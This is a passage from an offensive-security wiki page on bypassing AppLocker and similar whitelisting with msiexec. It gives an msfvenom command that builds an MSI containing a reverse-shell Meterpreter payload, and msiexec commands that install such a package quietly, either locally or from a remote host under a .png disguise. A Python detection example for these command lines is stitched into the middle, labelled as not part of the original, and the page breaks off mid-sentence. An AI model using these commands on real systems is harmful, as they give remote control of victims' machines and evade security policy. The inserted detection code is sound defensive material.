
Application Whitelisting Bypass

netbiosX edited this page Jun 16, 2017 · 3 revisions

Application Whitelisting Bypasses

The purpose of this page is to collect the technical details of bypassing application whitelisting solutions such as Software Restriction Policies, AppLocker and Device Guard.

MSIEXEC

MSIEXEC is a Microsoft utility used to install applications. If MSI files are not blocked by AppLocker, an attacker can use it to bypass the AppLocker executable rules.

Metasploit MSFVenom can be used to generate MSI files that contain a Meterpreter payload:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.100.3 LPORT=4444 -f msi > pentestlab.msi

MSI - Meterpreter Payload

Execution of the MSI file on the target system will return a Meterpreter session:

MSIEXEC - Meterpreter

The msiexec utility can execute MSI files either locally or remotely. Additionally, MSI files that have been renamed to PNG to avoid detection are still executed normally, with the same results.

msiexec /quiet /i cmd.msi

msiexec /q /i http://192.168.100.3/tmp/cmd.png
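For detection, the two invocations above can be recognised in process-creation logs. The following is an added example, not part of the original page: a small Python check that flags msiexec installs whose package is remote, does not end in .msi, or runs with the UI suppressed. The sample command lines, the function name and the finding labels are constructed for illustration, and treating UNC paths as remote goes slightly beyond the HTTP case shown on the page.

```python
import re

# Constructed process-creation command lines (Sysmon Event ID 1 / Security 4688 style).
SAMPLE_CMDLINES = [
    r'msiexec /quiet /i cmd.msi',
    r'msiexec /q /i http://192.168.100.3/tmp/cmd.png',
    r'"C:\Windows\System32\msiexec.exe" /i "C:\Installers\app setup.msi"',
    r'C:\Windows\System32\msiexec.exe /x {PRODUCT-CODE-PLACEHOLDER} /qn',
    r'notepad.exe C:\notes\msiexec.txt',
]

INSTALL_OPTS = {"/i", "/package"}     # options followed by a package path or URL
QUIET_OPTS = {"/q", "/qn", "/quiet"}  # options that suppress the installer UI


def msiexec_findings(cmdline):
    """Return the reasons a msiexec command line deserves review (hypothetical labels)."""
    # Tokenise while keeping quoted arguments (paths with spaces) in one piece.
    tokens = [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]
    if not tokens:
        return []
    image = re.split(r"[\\/]", tokens[0])[-1].lower()
    if image not in ("msiexec", "msiexec.exe"):
        return []

    package, quiet = None, False
    for i, tok in enumerate(tokens[1:], start=1):
        # msiexec accepts both "/" and "-" as the option prefix; normalise to "/".
        opt = "/" + tok[1:].lower() if tok[:1] in "/-" else None
        if opt in INSTALL_OPTS and i + 1 < len(tokens):
            package = tokens[i + 1]
        elif opt in QUIET_OPTS:
            quiet = True
    if package is None:
        return []  # not an install, e.g. an /x uninstall

    findings = []
    if re.match(r"(?i)https?://|\\\\", package):  # URL or UNC path
        findings.append("remote-package")
    if not package.split("?")[0].lower().endswith(".msi"):
        findings.append("non-msi-extension")
    if quiet:
        findings.append("quiet-install")
    return findings


if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        print(msiexec_findings(line) or ["ok"], line)
```

Quiet installs alone are common in legitimate software deployment, so the remote-package and non-msi-extension findings are the stronger signals.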

If the command prompt is locked, MSIEXEC can be executed from Windows Run: